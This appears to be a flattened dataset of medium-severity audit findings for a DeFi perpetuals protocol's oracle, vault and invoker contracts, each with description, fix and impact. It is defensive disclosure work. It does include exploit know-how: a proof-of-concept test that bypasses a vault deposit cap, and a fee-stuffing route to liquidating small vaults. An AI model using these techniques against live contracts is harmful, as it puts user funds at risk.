```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n
`KeeperOracle.request` adds only the first pair of market+account addresses per oracle version to callback list, ignoring all the subsequent ones
medium
The new feature introduced in 2.1 is the callback called for all markets and market+account pairs which requested the oracle version. These callbacks are called once the corresponding oracle settles. For this reason, `KeeperOracle` keeps a list of markets and market+account pairs per oracle version to call market.update on them:\\n```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n\\nHowever, currently `KeeperOracle` stores only the market+account from the first request call per oracle version, because if the request was already made, it returns from the function before adding to the list:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n@@@ if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n\\n // @audit only the first request per version reaches these lines to add market+account to callback list\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n}\\n```\\n\\nAccording to docs, the same `KeeperOracle` can be used by multiple markets. And every account requesting in the same oracle version is supposed to be called back (settled) once the oracle version settles.
Move addition to callback list to just before the condition to exit function early:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n}\\n```\\n
The new core function of the protocol doesn't work as expected and `KeeperOracle` will fail to call back markets and accounts if there is more than 1 request in the same oracle version (which is very likely).
```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n
`KeeperOracle.commit` will revert and won't work for all markets if any single `Market` is paused.
medium
According to protocol design (from KeeperOracle comments), multiple markets may use the same KeeperOracle instance:\\n```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n\\nHowever, if `KeeperOracle` is used by several `Market` instances, and one of them makes a request and is then paused before the settlement, `KeeperOracle` will be temporarily bricked until `Market` is unpaused. This happens, because `KeeperOracle.commit` will revert in market callback, as `commit` iterates through all requested markets and calls `update` on all of them, and `update` reverts if the market is paused.\\nThis means that pausing of just 1 market will basically stop trading in all the other markets which use the same `KeeperOracle`, disrupting protocol usage. When `KeeperOracle.commit` always reverts, it's also impossible to switch oracle provider from upstream `OracleFactory`, because provider switch still requires the latest version of previous oracle to be commited, and it will be impossible to commit it (both valid or invalid, requested or unrequested).\\nAdditionally, the market's `update` can also revert for some other reasons, for example if maker exceeds the maker limit after invalid oracle as described in the other issue.\\nAnd for another problem (although a low severity, but caused in the same lines), if too many markets are authorized to call `KeeperOracle.request`, the markets callback gas usage might exceed block limit, making it impossible to call `commit` due to not enough gas. Currently there is no limit of the amount of Markets which can be added to callback queue.\\n`KeeperOracle.commit` calls back `update` in all markets which called `request` in the oracle version:\\n```\\nfor (uint256 i; i < _globalCallbacks[version.timestamp].length(); i++)\\n _settle(IMarket(_globalCallbacks[version.timestamp].at(i)), address(0));\\n// rest of code\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nIf any `Market` is paused, its `update` function will revert (notice the `whenNotPaused` modifier):\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n```\\n\\nThis means that if any `Market` is paused, all the other markets will be unable to continue trading since `commit` in their oracle provider will revert. It will also be impossible to successfully switch to a new provider for these markets, because previous oracle provider must still `commit` its latest request before fully switching to a new oracle provider:\\n```\\nfunction _latestStale(OracleVersion memory currentOracleLatestVersion) private view returns (bool) {\\n if (global.current == global.latest) return false;\\n if (global.latest == 0) return true;\\n\\n@@@ if (uint256(oracles[global.latest].timestamp) > oracles[global.latest].provider.latest().timestamp) return false;\\n if (uint256(oracles[global.latest].timestamp) >= currentOracleLatestVersion.timestamp) return false;\\n\\n return true;\\n}\\n```\\n
Consider catching and ignoring revert, when calling `update` for the market in the `_settle` (wrap in try .. catch).\\nConsider adding a limit of the number of markets which are added to callback queue in each oracle version, or alternatively limit the number of authorized markets to call `request`.
One paused market will stop trading in all the markets which use the same oracle provider (KeeperOracle).
```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n
Vault `_maxDeposit` incorrect calculation allows to bypass vault deposit cap
medium
Vault has a deposit cap risk setting, which is the max amount of funds users can deposit into the vault. The problem is that `_maxDeposit` function, which calculates max amount of assets allowed to be deposited is incorrect and always includes vault claimable assets even when the vault is at the cap. This allows malicious (or even regular) user to deposit unlimited amount bypassing the vault cap, if the vault has any assets redeemed but not claimed yet. This breaks the core protocol function which limits users risk, for example when the vault is still in the testing phase and owner wants to limit potential losses in case of any problems.\\n`Vault._update` limits the user deposit to `_maxDeposit()` amount:\\n```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n\\nWhen calculating max deposit, the vault's collateral consists of vault assets as well as assets which are redeemed but not yet claimed. However, the formula used to calculate max deposit is incorrect, it is:\\n`maxDeposit = claimableAssets + (cap - min(collateral, cap))`\\nAs can be seen from the formula, regardless of cap and current collateral, maxDeposit will always be at least claimableAssets, even when the vault is already at the cap or above cap, which is apparently wrong. The correct formula should subtract claimableAssets from collateral (or 0 if claimableAssets is higher than collateral) instead of adding it to the result:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nCurrent incorrect formula allows to deposit up to claimable assets amount even when the vault is at or above cap. This can either be used by malicious user (user can deposit up to cap, redeem, deposit amount = up to cap + claimable, redeem, ..., repeat until target deposit amount is reached) or can happen itself when there are claimable assets available and vault is at the cap (which can easily happen by itself if some user forgets to claim or it takes long time to claim).\\nBypass of vault cap is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('bypass vault deposit cap', async () => {\\n console.log("start");\\n\\n await vault.connect(owner).updateParameter({\\n cap: parse6decimal('100'),\\n });\\n\\n await updateOracle()\\n\\n var deposit = parse6decimal('100')\\n console.log("Deposit 100")\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n\\n // additional deposit reverts due to cap\\n var deposit = parse6decimal('10')\\n console.log("Deposit 10 revert")\\n await expect(vault.connect(user).update(user.address, deposit, 0, 0)).to.be.reverted;\\n\\n // now redeem 50\\n var redeem = parse6decimal('50')\\n console.log("Redeem 50")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n\\n // deposit 100 (50+100=150) doesn't revert, because assets = 50\\n var deposit = parse6decimal('100')\\n console.log("Deposit 100")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n\\n var deposit = parse6decimal('50')\\n console.log("Deposit 50")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nDeposit 100\\nVault assets: 100000000\\nDeposit 10 revert\\nRedeem 50\\nVault assets: 50000000\\nDeposit 100\\nVault assets: 150000000\\nDeposit 50\\nVault assets: 200000000\\n```\\n\\nThe vault cap is set to 100 and is then demonstrated that it is bypassed and vault assets are set at 200 (and can be continued indefinitely)
The correct formula to `_maxDeposit` should be:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nSo the code can be:\\n```\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.parameter.cap.sub(collateral.sub(context.global.assets.min(collateral)).min(context.parameter.cap));\\n}\\n```\\n
Malicious and regular users can bypass vault deposit cap, either intentionally or just in the normal operation when some users redeem and claimable assets are available in the vault. This breaks core contract security function of limiting the deposit amount and can potentially lead to big user funds loss, for example at the initial stages when the owner still tests the oracle provider/market/etc and wants to limit vault deposit if anything goes wrong, but gets unlimited deposits instead.
```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n
Pending keeper and position fees are not accounted for in vault collateral calculation which can be abused to liquidate vault when it's small
medium
Vault opens positions in the underlying markets trying to keep leverage at the level set for each market by the owner. However, it uses sum of market collaterals which exclude keeper and position fees. But pending fees are included in account health calculations in the `Market` itself.\\nWhen vault TVL is high, this difference is mostly unnoticable. However, if vault is small and keeper fee is high enough, it's possible to intentionally add keeper fees by depositing minimum amounts from different accounts in the same oracle version. This keeps/increases vault calculated collateral, but its pending collateral in underlying markets reduces due to fees, which increases actual vault leverage, so it's possible to increase vault leverage up to maximum leverage possible and even intentionally liquidate the vault.\\nEven when the vault TVL is not low but keeper fee is large enough, the other issue reported allows to set vault leverage to max (according to margined amount) and then this issue allows to reduce vault collateral even further down to maintained amount and then commit slightly worse price and liquidate the vault.\\nWhen vault leverage is calculated, it uses collateral equal to sum of collaterals of all markets, loaded as following:\\n```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n\\nHowever, market's `local.collateral` excludes pending keeper and position fees. But pending fees are included in account health calculations in the `Market` itself (when loading pending positions):\\n```\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n// rest of code\\n if (protected && (\\n !context.closable.isZero() || // @audit-issue even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n@@@ context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n )) revert MarketInvalidProtectionError();\\n// rest of code\\n if (\\n@@@ !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMarginError();\\n\\n if (\\n@@@ !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThis means that small vault deposits from different accounts will be used for fees, but these fees will not be counted in vault underlying markets leverage calculations, allowing to increase vault's actual leverage.
Consider subtracting pending fees when loading underlying markets data context in the vault.
When vault TVL is small and keeper fees are high enough, it's possible to intentionally increase actual vault leverage and liquidate the vault by creating many small deposits from different user accounts, making the vault users lose their funds.
```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n
`MultiInvoker._latest` will return `latestPrice = 0` when latest oracle version is invalid causing liquidation to send 0 fee to liquidator or incorrect order execution
medium
There was a slight change of oracle versions handling in 2.1: now each requested oracle version must be commited, either as valid or invalid. This means that now the latest version can be invalid (price = 0). This is handled correctly in `Market`, which only uses timestamp from the latest oracle version, but the price comes either from latest version (if valid) or `global.latestPrice` (if invalid).\\nHowever, `MultiInvoker` always uses price from `oracle.latest` without verifying if it's valid, meaning it will return `latestPrice = 0` if the latest oracle version is invalid. This is returned from the `_latest` function.\\nSuch latest price = 0 leads to 2 main problems:\\nLiquidations orders in MultiInvoker will send 0 liquidation fee to liquidator (will liquidate for free)\\nSome TriggerOrders will trigger incorrectly (canExecuteOrder will return true when the real price didn't reach the trigger price, or false even if the real prices reached the trigger price)\\n`MultiInvoker._latest` has the following code for latest price assignment:\\n```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n\\nThis `latestPrice` is what's returned from the `_latest`, it isn't changed anywhere else. Notice that there is no check for latest oracle version validity.\\nAnd this is the code for KeeperOracle._commitRequested:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nNotice that commits made outside the timeout window simply increase `_global.latestIndex` without assigning `_prices`, meaning it remains 0 (invalid). This means that latest oracle version will return price=0 and will be invalid if commited after the timeout from request time has passed.\\nPrice returned by `_latest` is used when calculating liquidationFee:\\n```\\nfunction _liquidationFee(IMarket market, address account) internal view returns (Position memory, UFixed6, UFixed6) {\\n // load information about liquidation\\n RiskParameter memory riskParameter = market.riskParameter();\\n@@@ (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) = _latest(market, account);\\n\\n // create placeholder order for liquidation fee calculation (fee is charged the same on all sides)\\n Order memory placeholderOrder;\\n placeholderOrder.maker = Fixed6Lib.from(closableAmount);\\n\\n return (\\n latestPosition,\\n placeholderOrder\\n@@@ .liquidationFee(OracleVersion(latestPosition.timestamp, latestPrice, true), riskParameter)\\n .min(UFixed6Lib.from(market.token().balanceOf(address(market)))),\\n closableAmount\\n );\\n}\\n```\\n\\n`liquidationFee` calculation in order multiplies order size by `latestPrice`, meaning it will be 0 when price = 0. This liquidation fee is then used in `market.update` for liquidation fee to receive by liquidator:\\n```\\n function _liquidate(IMarket market, address account, bool revertOnFailure) internal isMarketInstance(market) {\\n@@@ (Position memory latestPosition, UFixed6 liquidationFee, UFixed6 closable) = _liquidationFee(market, account);\\n Position memory currentPosition = market.pendingPositions(account, market.locals(account).currentId);\\n currentPosition.adjust(latestPosition);\\n\\n try market.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n@@@ Fixed6Lib.from(-1, liquidationFee),\\n true\\n```\\n\\nThis means liquidator will receive 0 fee for the liquidation.\\nIt is also used in canExecuteOrder:\\n```\\n function _executeOrder(address account, IMarket market, uint256 nonce) internal {\\n if (!canExecuteOrder(account, market, nonce)) revert MultiInvokerCantExecuteError();\\n// rest of code\\n function canExecuteOrder(address account, IMarket market, uint256 nonce) public view returns (bool) {\\n TriggerOrder memory order = orders(account, market, nonce);\\n if (order.fee.isZero()) return false;\\n@@@ (, Fixed6 latestPrice, ) = _latest(market, account);\\n@@@ return order.fillable(latestPrice);\\n }\\n```\\n\\nMeaning `canExecuteOrder` will do comparision with price = 0 instead of real latest price. For example: limit buy order to buy when price <= 1000 (when current price = 1100) will trigger and execute buy at the price = 1100 instead of 1000 or lower.
`_latest` should replicate the process for the latest price from `Market` instead of using price from the oracle's latest version:\\nif the latest oracle version is valid, then use its price\\nif the latest oracle version is invalid, then iterate all global pending positions backwards and use price of any valid oracle version at the position.\\nif all pending positions are at invalid oracles, use market's `global.latestPrice`
liquidation done after invalid oracle version via `MultiInvoker` `LIQUIDATE` action will charge and send 0 liquidation fee from the liquidating account, thus liquidator loses these funds.\\nsome orders with comparison of type -1 (<= price) will incorrectly trigger and will be executed when price is far from reaching the trigger price. This loses user funds due to unexpected execution price of the pending order.
```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n
`MultiInvoker._latest` calculates incorrect closable for the current oracle version causing some liquidations to revert
medium
`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. There is one tricky edge case at the current oracle version which is calculated incorrectly in `MultiInvoker` (and also in Vault). This happens when pending position is updated in the current active oracle version: it is allowed to set this current position to any value conforming to `closable` of the previous pending (or latest) position. For example:\\nlatest settled position = 10\\nuser calls update(20) - pending position at t=200 is set to 20. If we calculate `closable` normally, it will be 10 (latest settled position).\\nuser calls update(0) - pending position at t=200 is set to 0. This is valid and correct. It looks as if we've reduced position by 20, bypassing the `closable` = 10 value, but in reality the only enforced `closable` is the previous one (for latest settled position in the example, so it's 10) and it's enforced as a change from previous position, not from current.\\nNow, if the step 3 happened in the next oracle version, so 3. user calls update(0) - pending position at t=300 will revert, because user can't close more than 10, and he tries to close 20.\\nSo in such tricky edge case, `MultiInvoker` (and Vault) will calculate `closable = 10` and will try to liquidate with position = 20-10 = 10 instead of 0 and will revert, because `Market._invariant` will calculate `closable = 10` (latest = 10, pending = 10, closable = latest = 10), but it must be 0 to liquidate (step 3. in the example above)\\nIn `Vault` case, this is less severe as the market will simply allow to redeem and will close smaller amount than it actually can.\\nWhen `Market` calculates `closable`, it's calculated starting from latest settled position up to (but not including) current position:\\n```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n\\nPay attention to `id < context.local.currentId` - the loop doesn't include currentId.\\nAfter the current position is updated to a new user specified value, only then the current position is processed and closable now includes new user position change from the previous position:\\n```\\nfunction _update(\\n // rest of code\\n // load\\n _loadUpdateContext(context, account);\\n // rest of code\\n context.currentPosition.local.update(collateral);\\n // rest of code\\n // process current position\\n _processPendingPosition(context, context.currentPosition.local);\\n // rest of code\\n // after\\n _invariant(context, account, newOrder, collateral, protected);\\n```\\n\\nThe `MultiInvoker._latest` logic is different and simply includes calculation of `closable` for all pending positions:\\n```\\nfor (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n}\\n```\\n\\nThe same incorrect logic is in a Vault:\\n```\\n// pending positions\\nfor (uint256 id = marketContext.local.latestId + 1; id <= marketContext.local.currentId; id++)\\n previousClosable = _loadPosition(\\n marketContext,\\n marketContext.currentAccountPosition = registration.market.pendingPositions(address(this), id),\\n previousClosable\\n );\\n```\\n
When calculating `closable` in `MultiInvoker` and `Vault`, add the following logic:\\nif timestamp of pending position at index currentId equals current oracle version, then add the difference between position size at currentId and previous position size to `closable` (both when that position increases and decreases).\\nFor example, if\\nlatest settled position = `10`\\npending position at t=200 = 20 then initialize `closable` to `10` (latest) add (pending-latest) = (20-10) to `closable` (closable = 20)
In the following edge case:\\ncurrent oracle version = oracle version of the pending position in currentId index\\nAND this (current) pending position increases compared to previous pending/settled position\\nThe following can happen:\\nliquidation via `MultiInvoker` will revert (medium impact)\\nvault's `maxRedeem` amount will be smaller than actual allowed amount, position will be reduced by a smaller amount than they actually can (low impact)
```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n
MultiInvoker closableAmount the calculation logic is wrong
medium
in `MultiInvoker._latest()` The incorrect use of `previousMagnitude = latestPosition.magnitude()` has led to an error in the calculation of `closableAmount`. This has caused errors in judgments that use this variable, such as `_liquidationFee()`.\\nThere are currently multiple places where the user's `closable` needs to be calculated, such as `market.update()`. The calculation formula is as follows in the code: `Market.sol`\\n```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n\\nIt will loop through `pendingPostion`, and each loop will set the variable `context.previousPendingMagnitude = newPendingPosition.magnitude();` to be used as the basis for the calculation of the next `pendingPostion`.\\n`closableAmount` is also calculated in `MultiInvoker._latest()`. The current implementation is as follows:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n }\\n```\\n\\nThis method also loops through `pendingPosition`, but incorrectly uses `latestPosition.magnitude()` to set `previousMagnitude`, `previousMagnitude` = latestPosition.magnitude();. The correct way should be `previousMagnitude = currentPendingPosition.magnitude()` like `market.sol`. This mistake leads to an incorrect calculation of `closableAmount`.
```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready// Remove the line below\\nto// Remove the line below\\nbe// Remove the line below\\nsettled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId // Add the line below\\n 1; id <= local.currentId; id// Add the line below\\n// Add the line below\\n) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n// Remove the line below\\n previousMagnitude = latestPosition.magnitude();\\n// Add the line below\\n previousMagnitude = pendingPosition.magnitude();\\n }\\n }\\n }\\n```\\n
The calculation of `closableAmount` is incorrect, which leads to errors in the judgments that use this variable, such as `_liquidationFee()`.
```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n
interfaceFee Incorrectly converted uint40 when stored
medium
The `interfaceFee.amount` is currently defined as `uint48` , with a maximum value of approximately `281m`. However, it is incorrectly converted to `uint40` when saved, `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`, which means the maximum value can only be approximately `1.1M`. If a user sets an order where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully but the actual stored value may be truncated to `0`. This is not what the user expects, and the user may think that the order has been set, but in reality, it is an incorrect order. Although a fee of `1.1M` is large, it is not impossible.\\n`interfaceFee.amount` is defined as `uint48` the legality check also uses `type(uint48).max`, but `uint40` is used when saving.\\n```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n\\nWe can see that when saving, it is forcibly converted to `uint40`, as in `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`. The order can be saved successfully, but the actual storage may be truncated to `0`.
